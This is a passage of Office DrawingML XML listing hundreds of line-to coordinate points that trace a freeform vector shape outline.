                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="1249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="518" y="1250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="1249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="1250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="1247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="503" y="1252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="1260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="1266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="1270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="1273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="1273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="1275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="1282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="1284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="1288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="508" y="1293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="1300"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="1302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="1301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="1302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="1312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="1317"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="1316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="1326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="487" y="1331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="1331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="1330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="1332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="1332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="1339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="1345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="1348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="1364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="1378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="1379"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="1387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="1395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="1398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="470" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="1404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="1405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="1411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="1419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="1426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="1426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="1422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="1415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="1419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="1428"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="1419"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="1411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="1408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="1406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="1401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="1398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="1395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="1392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="1388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="1385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="1390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="1390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="1392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="1392"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="1393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="1393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="1397"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="1401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="1395"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="1390"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="1387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="1384"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="1380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="1374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="1363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="1352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="1349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="367" y="1348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364" y="1348"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="1344"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="1343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="1339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="1332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="1326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="1322"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="1321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="1320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="1315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="1305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="1303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="1304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="1295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="1292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="1288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="1282"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="1276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="1271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="1269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="1263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="1258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="1261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="1263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="338" y="1270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="1272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="1277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="1248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="1240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="1234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="1229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="1230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="1230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="1224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="1199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="1200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="1189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="1186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="1167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="1159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="1158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="1154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="1156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="1148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="1145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="1140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="1143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="1146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="1130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="1119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="1116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="1101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="1109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="1108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1094"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="1089"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="1088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="1088"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="1081"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="1071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="1062"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="1053"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="1047"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="1044"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="1044"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="1038"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="1027"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="1025"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="1024"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="1017"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="1007"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="1006"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="1009"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="1026"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="1023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="1014"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="1002"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="992"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="981"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="970"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="967"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="959"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="956"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="949"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="966"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="978"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="977"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="969"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="964"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="271" y="950"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="282" y="909"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="906"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="872"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="852"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="828"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="794"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="780"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="770"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="763"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="737"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="726"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="722"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="695"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="706"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="716"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="631"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="626"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="616"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="595"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="596"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="584"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="558"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="526"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="517"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="511"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="401"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="292"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="285" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="260"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="343" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="434" y="83"/>
